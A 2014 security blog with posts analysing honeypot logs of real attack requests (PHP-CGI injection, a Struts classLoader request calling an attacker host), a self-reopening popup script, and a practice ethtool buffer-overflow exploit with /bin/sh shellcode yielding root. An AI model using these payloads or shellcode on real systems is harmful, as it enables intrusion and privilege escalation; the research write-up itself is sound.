Sunday, 27 April 2014

[EN] Bots in the log

Few weeks ago I decide to create another mini-honeypot.
To do this, I used Apache server with ModSecurity installed.

After few modifications of existing rules, next thing was to
create some 'log reader' to quick check if there is something
new (and interesting) in logs, or not. And of course, to
learn more about how bots are talking with my machine,
where they want to connect, and what 'exploits' they are
using.

During last few weeks I was observing multiple GET and POST
requests to Apache (where I have only index.html and robots.txt
file, but it wasn't a hint for attackers, because they scanned
all possible vulnerabilities anyway ;)).

For example, few very often requests was related to vulnerable phpMyAdmin installation and other old webapps:
---<code>---
# grep GET modsec_audit.log
GET /phpTest/zologize/axa.php HTTP/1.1
GET /phpMyAdmin/scripts/setup.php HTTP/1.1
GET /pma/scripts/setup.php HTTP/1.1
GET /myadmin/scripts/setup.php HTTP/1.1
GET / HTTP/1.1
GET /robots.txt HTTP/1.1
---<code>---

This is not the problem to find out what vulnerabilities was
tried to reach, let's google it:
 

---<code>---
POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1
---<code>---

As you can see, here is a very useful post 

(by SpiderLabs) about this vulnerability.

Of course you can now get 'tools' from this kind of POST (http://attackers-host/histool)
and read it. Often you will find bash script, trying to download pscan or some exploit to get-root on your machine. 

Kind of fun ;)

But probably nothing new...

Anyway, in a last few days I found interesting line in logs:
---<code>---
162.213.24.40 - - [25/Apr/2014:22:38:05 +0200] "GET /toplel.action?class[%27classLoader%27][%27resources%27][%27dirContext%27][%27docBase%27]=//162.213.24.40/toplel HTTP/1.0" 403 466 "-" "-"
---<code>---

I was a little surprised, because this was the first time I saw it in my logs. So I tried to find some information at google, and that's how I found a very nice post at SpamBotSecurity Forum
that this is a bug in Apache Struts but also please check this.

(Also 'toplel' seems to be a malware)

Probably in the future I will post here something new about it,
but now if you want, you can check my simple log reader to verify

if in your logs you will find something interesting.

Of course you can use another simple script to block
this kind of requests. Check this out:
---<code>---
# cat ban_modsec.sh
#!/bin/sh

# script to simple block all IP's from mod_security.log
MODSLOG="/var/log/apache2/modsec_audit.log"

#uniq IP addresses to block
echo ""
echo "In the last mod_security log, found : [`grep 200 $MODSLOG |grep 2014 | cut -d' ' -f 4|sort | uniq | wc -l`]"
echo ""
grep 200 $MODSLOG |grep 2014 | cut -d' ' -f 4|sort | uniq > 2ban.log

for line in `cat 2ban.log`; do
        iptables -A INPUT -s $line -j DROP
        echo "[+] $line - banned"
done
date >> 2ban.log
echo "-------------------------------------------" >> 2ban.log
echo "[+] Done."

---<code>---

If you have any ideas how can we build more secure servers
feel free to write a comment here.

Enjoy ;)

Tuesday, 15 April 2014

[EN] Just allow popup

k@lab:~/public_html/js$ cat xxx.html
<!-- seems to be simple ;]                       --!>
<!-- of course will work only with popup enabled --!>

<script>
function NewTab(url){
        var hi=window.open(url, '_blank');
        hi.focus();
}
NewTab(window.location);
</script>
k@lab:~/public_html/js$


;]

Friday, 11 April 2014

[EN] Old-school buffer overflow - ethtool

During last days I was checking some old apps for Slackware 9.1.

My goal was to find some useful bugs to write few exploits (just for practice of course).
During simple fuzzing, I found that 'ethtool' is vulnerable in few places to buffer overflow.

Below is a short note from testing (overflow in '-k' param):

---<code>---
tester@box:~/code/tests/ethtool-3 $ head README
ethtool is a small utility for examining and tuning your ethernet-based
network interface.  See the man page for more details.
tester@box:~/code/tests/ethtool-3 $ head NEWS

Version 3 - January 27, 2005

        * Feature: r8159 register dump support
        * Feature / bug fix: Support advertising gigabit ethernet
        * Bug fix: make sure to advertise 10baseT-HD
        * Other minor bug fixes.

Version 2 - August 17, 2004
 

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -k `perl -e 'print "\x90"x21,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","\x90\xfb\xff\xbf"'`
Offload parameters for 1ŔPh//shh/binăPSá°
                                         Íű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2$ whoami
tester
sh-3.2$

---<code>---

Few more options of ethtool are also vulnerable (seems to be the same buffer value):
---<code>---

tester@box:~/code/tests/ethtool-3 $ gdb -q ./ethtool
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) r -K ` perl -e 'print "A"x44,"BBBB"'`
Starting program: /home/tester/code/tests/ethtool-3/ethtool -K ` perl -e 'print "A"x44,"BBBB"'`
no offload settings changed

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -r ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -r ` perl -e 'print "A"x44,"BBBB"'`
Cannot restart autonegotiation: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -p ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -p ` perl -e 'print "A"x44,"BBBB"'`
Cannot identify NIC: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -t ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -t ` perl -e 'print "A"x44,"BBBB"'`
Cannot get driver information: No such device

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) r -s ` perl -e 'print "A"x44,"BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/tester/code/tests/ethtool-3/ethtool -s ` perl -e 'print "A"x44,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

---<code>---

And if we'll set chown for root and +s for ethtool, we will get:
---<code>---

tester@box:~/code/tests/ethtool-3 $ ls -la ethtool
-rwsr-sr-x 1 root root 203201 Apr  9 15:19 ethtool
tester@box:~/code/tests/ethtool-3 $ ./exthtool

        -=[ ethtool - local buffer overflow exploit ]=-

Offload parameters for 1ŔPh//shh/binăPSá°
                                         Í°ű˙ż:
Cannot get device rx csum settings: No such device
Cannot get device tx csum settings: No such device
Cannot get device scatter-gather settings: No such device
Cannot get device tcp segmentation offload settings: No such device
no offload info available
sh-3.2# whoami
root
sh-3.2#

---<code>--- 

That's all :)
Happy hunting!

o/